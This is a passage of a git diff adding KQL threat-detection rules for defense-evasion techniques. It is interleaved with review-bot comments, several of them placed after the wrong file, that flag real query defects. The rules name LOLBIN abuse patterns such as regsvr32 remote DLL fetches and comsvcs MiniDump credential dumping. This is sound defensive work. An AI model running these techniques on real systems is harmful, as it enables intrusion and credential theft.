+// Date: 2023-06-02
+// Level: medium
+// Description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where FolderPath startswith "/tmp/" and (not(FolderPath endswith "/usr/bin/nextcloud"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql
new file mode 100644
index 00000000..39f05471
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-25
+// Level: medium
+// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\") and ((FolderPath endswith "\\Regsvcs.exe" or FolderPath endswith "\\Regasm.exe") or (ProcessVersionInfoOriginalFileName in~ ("RegSvcs.exe", "RegAsm.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql
new file mode 100644
index 00000000..476dd3f0
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-13
+// Level: medium
+// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".dat" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".txt") and ((FolderPath endswith "\\Regsvcs.exe" or FolderPath endswith "\\Regasm.exe") or (ProcessVersionInfoOriginalFileName in~ ("RegSvcs.exe", "RegAsm.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql b/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql
new file mode 100644
index 00000000..9877b57d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious GoogleUpdate Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects potentially suspicious child processes of "GoogleUpdate.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" and (not((isnull(FolderPath) or (FolderPath contains "\\Google" or (FolderPath endswith "\\setup.exe" or FolderPath endswith "chrome_updater.exe" or FolderPath endswith "chrome_installer.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql b/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql
new file mode 100644
index 00000000..2a629634
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Office Document Executed From Trusted Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: high
+// Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\dopus.exe") and (ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Templates" or ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Word\\Startup\\" or ProcessCommandLine contains "\\Microsoft Office\\root\\Templates\\" or ProcessCommandLine contains "\\Microsoft Office\\Templates\\")) and (not((ProcessCommandLine endswith ".dotx" or ProcessCommandLine endswith ".xltx" or ProcessCommandLine endswith ".potx")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql b/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql
new file mode 100644
index 00000000..d5dbfc34
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql
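Review bot: The template exclusion at the end of the `| where` line, `not((ProcessCommandLine endswith ".dotx" or ... ".potx"))`, only takes effect when the extension is the very last thing on the command line; if Explorer hands Office a quoted document path (and possibly trailing switches), the line ends with `"` or a switch and the exclusion silently never applies, so plain template launches would alert at high severity. This mirrors the upstream rule's `endswith`, so it is a faithful translation, but it is worth checking against real telemetry before relying on it. If quoted paths are the norm, adding the quoted forms, e.g. `ProcessCommandLine endswith ".dotx\""`, alongside the existing ones would restore the intended exclusion without widening it to a plain `contains`.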
@@ -0,0 +1,11 @@
+// Title: Potentially Suspicious Ping/Copy Command Combination
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-18
+// Level: medium
+// Description: Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ping" and ProcessCommandLine contains "copy ") and (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (ProcessCommandLine contains " -y " or ProcessCommandLine contains " /y " or ProcessCommandLine contains " –y " or ProcessCommandLine contains " —y " or ProcessCommandLine contains " ―y ") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql
new file mode 100644
index 00000000..0ccc5bc1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-05-24
+// Level: medium
+// Description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /i" or ProcessCommandLine contains " -i") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains "ftp" or ProcessCommandLine contains "http")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql
new file mode 100644
index 00000000..dcfeef7f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Regsvr32 HTTP IP Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-11
+// Level: high
+// Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - FQDNs that start with a number such as "7-Zip"
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains " /i:http://1" or ProcessCommandLine contains " /i:http://2" or ProcessCommandLine contains " /i:http://3" or ProcessCommandLine contains " /i:http://4" or ProcessCommandLine contains " /i:http://5" or ProcessCommandLine contains " /i:http://6" or ProcessCommandLine contains " /i:http://7" or ProcessCommandLine contains " /i:http://8" or ProcessCommandLine contains " /i:http://9" or ProcessCommandLine contains " /i:https://1" or ProcessCommandLine contains " /i:https://2" or ProcessCommandLine contains " /i:https://3" or ProcessCommandLine contains " /i:https://4" or ProcessCommandLine contains " /i:https://5" or ProcessCommandLine contains " /i:https://6" or ProcessCommandLine contains " /i:https://7" or ProcessCommandLine contains " /i:https://8" or ProcessCommandLine contains " /i:https://9" or ProcessCommandLine contains " -i:http://1" or ProcessCommandLine contains " -i:http://2" or ProcessCommandLine contains " -i:http://3" or ProcessCommandLine contains " -i:http://4" or ProcessCommandLine contains " -i:http://5" or ProcessCommandLine contains " -i:http://6" or ProcessCommandLine contains " -i:http://7" or ProcessCommandLine contains " -i:http://8" or ProcessCommandLine contains " -i:http://9" or ProcessCommandLine contains " -i:https://1" or ProcessCommandLine contains " -i:https://2" or ProcessCommandLine contains " -i:https://3" or ProcessCommandLine contains " -i:https://4" or ProcessCommandLine contains " -i:https://5" or ProcessCommandLine contains " -i:https://6" or ProcessCommandLine contains " -i:https://7" or ProcessCommandLine contains " -i:https://8" or ProcessCommandLine contains " -i:https://9")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql
new file mode 100644
index 00000000..ae6e77df
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql
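Review bot: The `| where` line spells out 36 near-identical `ProcessCommandLine contains " /i:http://1"` … `" -i:https://9"` terms, which is hard to review and easy to get subtly wrong whenever the list is regenerated. The variants differ only in the switch character, the scheme and the leading digit, so one expression states the same condition: `ProcessCommandLine matches regex @"(?i) [/-]i:https?://[1-9]"`, where `(?i)` keeps the case-insensitive semantics of `contains`. If the backend is meant to emit Sigma wildcard lists literally, this is better done as a converter option than as a hand edit of the generated file.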
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Rundll32 Activity
+// Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "javascript:" and ProcessCommandLine contains ".RegisterXLL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURLA") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "FileProtocolHandler") or (ProcessCommandLine contains "zipfldr.dll" and ProcessCommandLine contains "RouteTheCall") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "ShellExec_RunDLL") or (ProcessCommandLine contains "mshtml.dll" and ProcessCommandLine contains "PrintHTML") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieframe.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "shdocvw.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "syssetup.dll" and ProcessCommandLine contains "SetupInfObjectInstallAction") or (ProcessCommandLine contains "setupapi.dll" and ProcessCommandLine contains "InstallHinfSection") or (ProcessCommandLine contains "pcwutl.dll" and ProcessCommandLine contains "LaunchApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbShortcut") or (ProcessCommandLine contains "scrobj.dll" and ProcessCommandLine contains "GenerateTypeLib" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "shimgvw.dll" and ProcessCommandLine contains "ImageView_Fullscreen" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "comsvcs.dll" and ProcessCommandLine contains "MiniDump")) and (not((((ProcessCommandLine contains "Shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".cpl") and InitiatingProcessCommandLine contains ".cpl" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe") or ProcessCommandLine contains "shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver" or (ProcessCommandLine endswith ".cpl\"," and ProcessCommandLine startswith "\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql
new file mode 100644
index 00000000..362e2577
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql
@@ -0,0 +1,14 @@
+// Title: Potentially Suspicious Rundll32.EXE Execution of UDL File
+// Author: @kostastsale
+// Date: 2024-08-16
+// Level: medium
+// Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.
+Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011, attack.t1071
+// False Positives:
+// - UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "oledb32.dll" and ProcessCommandLine contains ",OpenDSLFile " and (ProcessCommandLine contains "\\Users\\" and ProcessCommandLine contains "\\Downloads\\")) and ProcessCommandLine endswith ".udl") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql b/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql
new file mode 100644
index 00000000..33c0cdf3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql
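Review bot: The second description line, `+Threat actors can abuse this technique ...`, is written without the `//` prefix, so the generated file contains a bare English sentence outside any comment and is not a valid KQL query as committed; the same happens in potentially_suspicious_wuauclt_network_connection.kql (`One could easily make the DLL ...`), powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql (`This is a highly suspicious ...` and `An attacker might use ...`) and powershell_executed_from_headless_conhost_process.kql (`The "--headless" flag ...`). The converter should comment every line of a multi-line Sigma description, emitting here `// Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.` followed by `// Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.`. The empty `+` line that follows the description in each of these files looks like the same newline-handling path and could be dropped at the same time.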
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load
+// Author: frack113
+// Date: 2023-02-17
+// Level: medium
+// Description: Detects the image load of VSS DLL by uncommon executables
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1490
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\vsstrace.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\{"))))) and (not((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql b/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql
new file mode 100644
index 00000000..8151d305
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql
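Review bot: `isnull(InitiatingProcessFolderPath)` in the first exclusion group never evaluates to true, because Kusto `string` columns cannot hold null and a missing path arrives as the empty string, so image loads with no initiating-process path are not excluded as the filter intends. Replace it with `isempty(InitiatingProcessFolderPath)`. The same `isnull(...)` on a string column appears in potentially_suspicious_wuauclt_network_connection.kql, where it is redundant next to the `=~ ""` test.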
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious WDAC Policy File Creation
+// Author: X__Junior
+// Date: 2025-02-07
+// Level: medium
+// Description: Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Administrators and security vendors could leverage WDAC, apply additional filters as needed.
+
+DeviceFileEvents
+| where FolderPath contains "\\Windows\\System32\\CodeIntegrity\\" and (not((((InitiatingProcessCommandLine contains "ConvertFrom-CIPolicy -XmlFilePath" and InitiatingProcessCommandLine contains "-BinaryFilePath ") or InitiatingProcessCommandLine contains "CiTool --update-policy" or (InitiatingProcessCommandLine contains "Copy-Item -Path" and InitiatingProcessCommandLine contains "-Destination")) or (InitiatingProcessFolderPath endswith "\\Microsoft.ConfigurationManagement.exe" or InitiatingProcessFolderPath endswith "\\WDAC Wizard.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") or InitiatingProcessFolderPath =~ "System")))
\ No newline at end of file
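Review bot: The `DeviceFileEvents` query carries no `ActionType` filter, so a rule titled as detecting policy file creation also fires on `FileModified`, `FileRenamed` and `FileDeleted` events under `\Windows\System32\CodeIntegrity\`; adding `and ActionType == "FileCreated"` to the `| where` restores the Sigma file_event semantics. The same omission is more costly in powershell_console_history_logs_deleted.kql, where without `ActionType == "FileDeleted"` the rule matches every write PSReadLine makes to `ConsoleHost_history.txt`, i.e. essentially every interactive PowerShell session, instead of deletions only. Separately, terms such as `InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe"` compare a full path with `endswith`; `=~` (or one `in~ (...)` over the list) states the intent and reads more clearly.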
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql b/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql
new file mode 100644
index 00000000..6f2558fb
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Windows App Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-12
+// Level: medium
+// Description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate packages that make use of external binaries such as Windows Terminal
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\" and ((ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Base64") or (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe")) and (not(((FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.SysinternalsSuite") or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql b/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql
new file mode 100644
index 00000000..2806782f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Wuauclt Network Connection
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-12
+// Level: medium
+// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.
+One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceNetworkEvents
+| where (InitiatingProcessCommandLine contains " /RunHandlerComServer" and InitiatingProcessFolderPath contains "wuauclt") and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine) or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.79.0.0/16") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11")) or (InitiatingProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or InitiatingProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (InitiatingProcessCommandLine contains ":\\Windows\\WinSxS\\" and InitiatingProcessCommandLine contains "\\UpdateDeploy.dll /ClassId "))))
\ No newline at end of file
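Review bot: `ipv4_is_in_range(RemoteIP, "::1/128")`, `"fe80::/10"` and `"fc00::/7"` hand IPv6 prefixes to an IPv4-only function, which cannot parse them and yields null, so IPv6 loopback, link-local and ULA destinations are never excluded and will surface as alerts on dual-stack hosts. Replace those three terms with `ipv6_is_in_range(RemoteIP, "::1/128") or ipv6_is_in_range(RemoteIP, "fe80::/10") or ipv6_is_in_range(RemoteIP, "fc00::/7")`. The `isnull(InitiatingProcessCommandLine)` term is always false for a string column and can be dropped, since `=~ ""` already covers the empty case.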
diff --git a/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql b/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql
new file mode 100644
index 00000000..f545b0d6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Base64 Encoded FromBase64String Cmdlet
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-08-24
+// Level: high
+// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql b/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql
new file mode 100644
index 00000000..564d3923
--- /dev/null
+++ b/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql
@@ -0,0 +1,10 @@
+// Title: Powershell Base64 Encoded MpPreference Cmdlet
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-04
+// Level: high
+// Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "QWRkLU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "BZGQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "U2V0LU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "TZXQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "YWRkLW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "hZGQtbXBwcmVmZXJlbmNlI" or ProcessCommandLine contains "c2V0LW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "zZXQtbXBwcmVmZXJlbmNlI") or (ProcessCommandLine contains "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA")
\ No newline at end of file
